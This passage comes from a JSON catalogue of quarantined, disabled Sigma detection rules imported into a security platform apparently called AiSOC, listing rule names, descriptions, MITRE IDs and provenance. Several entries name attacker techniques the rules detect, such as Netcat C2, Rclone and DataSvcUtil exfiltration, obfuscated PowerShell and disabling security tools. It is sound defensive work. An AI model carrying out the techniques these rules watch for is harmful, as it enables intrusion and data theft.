"mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/increased-failed-authentications-of-any-type.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e1d02b53-c03c-4948-b11d-4d00cca49d03", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/cloud/azure/signin_logs/azure_ad_auth_failure_increase.yml" } }, { "id": "sigmahq-sigma-e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", "type": "detection", "name": "File Encryption/Decryption Via Gpg4win From Suspicious Locations", "description": "Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-encryption-decryption-via-gpg4win-from-suspicious-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_gpg4win_susp_location.yml" } }, { "id": "sigmahq-sigma-e1f7febb-7b94-4234-b5c6-00fb8500f5dd", "type": "detection", "name": "New Network ACL Entry Added", "description": "Detects that network ACL entries have been added to a route table which could indicate that new attack vectors have been opened up in the AWS account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1686.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-network-acl-entry-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"e1f7febb-7b94-4234-b5c6-00fb8500f5dd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_new_acl_entries.yml" } }, { "id": "sigmahq-sigma-e2072cab-8c9a-459b-b63c-40ae79e27031", "type": "detection", "name": "Decode Base64 Encoded Text", "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/decode-base64-encoded-text.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e2072cab-8c9a-459b-b63c-40ae79e27031", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_base64_decode.yml" } }, { "id": "sigmahq-sigma-e20b5b14-ce93-4230-88af-981983ef6e74", "type": "detection", "name": "QuickAssist Execution", "description": "Detects the execution of Microsoft Quick Assist tool \"QuickAssist.exe\". 
This utility can be used by attackers to gain remote access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/quickassist-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e20b5b14-ce93-4230-88af-981983ef6e74", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_quickassist_execution.yml" } }, { "id": "sigmahq-sigma-e212d415-0e93-435f-9e1a-f29005bb4723", "type": "detection", "name": "Suspicious Remote Child Process From Outlook", "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-remote-child-process-from-outlook.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e212d415-0e93-435f-9e1a-f29005bb4723", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml" } }, { 
"id": "sigmahq-sigma-e218595b-bbe7-4ee5-8a96-f32a24ad3468", "type": "detection", "name": "Suspicious Curl.EXE Download", "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-curl-exe-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_curl_susp_download.yml" } }, { "id": "sigmahq-sigma-e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", "type": "detection", "name": "Potential MsiExec Masquerading", "description": "Detects the execution of msiexec.exe from an uncommon directory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-msiexec-masquerading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml" } }, { "id": "sigmahq-sigma-e2326866-609f-4015-aea9-7ec634e8aa04", "type": "detection", "name": "Shell Execution via Rsync - Linux", "description": "Detects the use of the \"rsync\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-execution-via-rsync-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e2326866-609f-4015-aea9-7ec634e8aa04", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_rsync_shell_execution.yml" } }, { "id": "sigmahq-sigma-e2482f8d-3443-4237-b906-cc145d87a076", "type": "detection", "name": "Disable Internal Tools or Feature in Registry", "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-internal-tools-or-feature-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "SigmaHQ/sigma", "source_id": "e2482f8d-3443-4237-b906-cc145d87a076", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_function_user.yml" } }, { "id": "sigmahq-sigma-e2812b49-bae0-4b21-b366-7c142eafcde2", "type": "detection", "name": "Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript", "description": "Detects usage of the WMI class \"Win32_NTEventlogFile\" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-call-to-win32-nteventlogfile-class-psscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e2812b49-bae0-4b21-b366-7c142eafcde2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_win32_nteventlogfile_usage.yml" } }, { "id": "sigmahq-sigma-e290b10b-1023-4452-a4a9-eb31a9013b3a", "type": "detection", "name": "LOLBAS Data Exfiltration by DataSvcUtil.exe", "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": 
"imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lolbas-data-exfiltration-by-datasvcutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e290b10b-1023-4452-a4a9-eb31a9013b3a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" } }, { "id": "sigmahq-sigma-e2b5163d-7deb-4566-9af3-40afea6858c3", "type": "detection", "name": "Certificate Private Key Acquired", "description": "Detects when an application acquires a certificate private key", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/certificate-private-key-acquired.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e2b5163d-7deb-4566-9af3-40afea6858c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/capi2/win_capi2_acquire_certificate_private_key.yml" } }, { "id": "sigmahq-sigma-e2e01011-5910-4267-9c3b-4149ed5479cf", "type": "detection", "name": "Potential WWlib.DLL Sideloading", "description": "Detects potential DLL sideloading of \"wwlib.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, 
"playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-wwlib-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e2e01011-5910-4267-9c3b-4149ed5479cf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_wwlib.yml" } }, { "id": "sigmahq-sigma-e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", "type": "detection", "name": "Compress Data and Lock With Password for Exfiltration With WINZIP", "description": "Detects WinZip compressing or password-protecting collected data, as an adversary may do prior to exfiltration using 3rd party utilities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/compress-data-and-lock-with-password-for-exfiltration-with-winzip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winzip_password_compression.yml" } }, { "id": "sigmahq-sigma-e2f17c5d-b02a-442b-9052-6eb89c9fec9c", "type": "detection", "name": "Screen Capture with Xwd", "description": "Detects an adversary creating a screen capture of the full screen with xwd. 
Using this rule on servers is highly recommended, due to the high usage of screenshot utilities on user workstations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/screen-capture-with-xwd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e2f17c5d-b02a-442b-9052-6eb89c9fec9c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_screencaputre_xwd.yml" } }, { "id": "sigmahq-sigma-e2feb918-4e77-4608-9697-990a1aaf74c3", "type": "detection", "name": "Google Cloud Storage Buckets Enumeration", "description": "Detects when storage buckets are enumerated in Google Cloud.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-storage-buckets-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e2feb918-4e77-4608-9697-990a1aaf74c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_bucket_enumeration.yml" } }, { "id": "sigmahq-sigma-e30de276-68ec-435c-ab99-ef3befec6c61", "type": "detection", "name": "OpenCanary - SIP Request", 
"description": "Detects instances where a SIP service on an OpenCanary node has received a SIP request.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1123" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-sip-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e30de276-68ec-435c-ab99-ef3befec6c61", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_sip_request.yml" } }, { "id": "sigmahq-sigma-e31033fc-33f0-4020-9a16-faf9b31cbf08", "type": "detection", "name": "PUA - Netcat Suspicious Execution", "description": "Detects execution of Netcat. 
Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1095" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-netcat-suspicious-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_netcat.yml" } }, { "id": "sigmahq-sigma-e312efd0-35a1-407f-8439-b8d434b438a6", "type": "detection", "name": "Potential PowerShell Obfuscation Via WCHAR/CHAR", "description": "Detects suspicious encoded character syntax often used for defense evasion", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-powershell-obfuscation-via-wchar-char.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e312efd0-35a1-407f-8439-b8d434b438a6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml" } }, { "id": "sigmahq-sigma-e31bae15-83ed-473e-bf31-faf4f8a17d36", "type": "detection", "name": "New Kubernetes Service Account Created", "description": "Detects creation of new Kubernetes service account, which could indicate an attacker's attempt to persist within a cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1136" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-kubernetes-service-account-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e31bae15-83ed-473e-bf31-faf4f8a17d36", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_serviceaccount_creation.yml" } }, { "id": "sigmahq-sigma-e32d4572-9826-4738-b651-95fa63747e8a", "type": "detection", "name": "Base64 Encoded PowerShell Command Detected", "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1140", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/base64-encoded-powershell-command-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "e32d4572-9826-4738-b651-95fa63747e8a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml" } }, { "id": "sigmahq-sigma-e32f92d1-523e-49c3-9374-bdb13b46a3ba", "type": "detection", "name": "Suspicious Mshta.EXE Execution Patterns", "description": "Detects suspicious mshta process execution patterns", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1106" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-mshta-exe-execution-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml" } }, { "id": "sigmahq-sigma-e3393cba-31f0-4207-831e-aef90ab17a8c", "type": "detection", "name": "SAML Token Issuer Anomaly", "description": "Indicates the SAML token issuer for the associated SAML token is potentially compromised. 
The claims included in the token are unusual or match known attacker patterns", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1606" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/saml-token-issuer-anomaly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e3393cba-31f0-4207-831e-aef90ab17a8c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_token_issuer_anomaly.yml" } }, { "id": "sigmahq-sigma-e34cfa0c-0a50-4210-9cb3-5632d08eb041", "type": "detection", "name": "Potential GobRAT File Discovery Via Grep", "description": "Detects the use of grep to discover specific files created by the GobRAT malware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-gobrat-file-discovery-via-grep.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e34cfa0c-0a50-4210-9cb3-5632d08eb041", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml" } }, { "id": 
"sigmahq-sigma-e36941d0-c0f0-443f-bc6f-cb2952eb69ea", "type": "detection", "name": "PowerShell Module File Created", "description": "Detects the creation of a new PowerShell module \".psm1\", \".psd1\", \".dll\", \".ps1\", etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-module-file-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e36941d0-c0f0-443f-bc6f-cb2952eb69ea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_powershell_module_creation.yml" } }, { "id": "sigmahq-sigma-e37db05d-d1f9-49c8-b464-cee1a4b11638", "type": "detection", "name": "PUA - Rclone Execution", "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-rclone-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/windows/process_creation/proc_creation_win_pua_rclone_execution.yml" } }, { "id": "sigmahq-sigma-e3818659-5016-4811-a73c-dde4679169d2", "type": "detection", "name": "Suspicious Computer Machine Password by PowerShell", "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-computer-machine-password-by-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e3818659-5016-4811-a73c-dde4679169d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml" } }, { "id": "sigmahq-sigma-e3845023-ca9a-4024-b2b2-5422156d5527", "type": "detection", "name": "PowerShell Module File Created By Non-PowerShell Process", "description": "Detects the creation of a new PowerShell module \".psm1\", \".psd1\", \".dll\", \".ps1\", etc. 
by a non-PowerShell process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-module-file-created-by-non-powershell-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e3845023-ca9a-4024-b2b2-5422156d5527", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_powershell_module_uncommon_creation.yml" } }, { "id": "sigmahq-sigma-e386b9b5-af12-450e-afff-761730fb8a98", "type": "detection", "name": "AWS VPC Flow Logs Deleted", "description": "Detects the deletion of one or more VPC Flow Logs in AWS Elastic Compute Cloud (EC2) through the DeleteFlowLogs API call.\nAdversaries may delete flow logs to evade detection or remove evidence of network activity, hindering forensic investigations and visibility into malicious operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-vpc-flow-logs-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e386b9b5-af12-450e-afff-761730fb8a98", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_vpc_flow_logs_deleted.yml" } }, { "id": "sigmahq-sigma-e3a8a052-111f-4606-9aee-f28ebeb76776", "type": "detection", "name": "Disabling Security Tools", "description": "Detects disabling security tools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disabling-security-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e3a8a052-111f-4606-9aee-f28ebeb76776", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml" } }, { "id": "sigmahq-sigma-e3b50fa5-3c3f-444e-937b-0a99d33731cd", "type": "detection", "name": "Outlook Macro Execution Without Warning Setting Enabled", "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1137", "T1008", "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outlook-macro-execution-without-warning-setting-enabled.yaml", "quarantine_reason": "imported rule; upstream 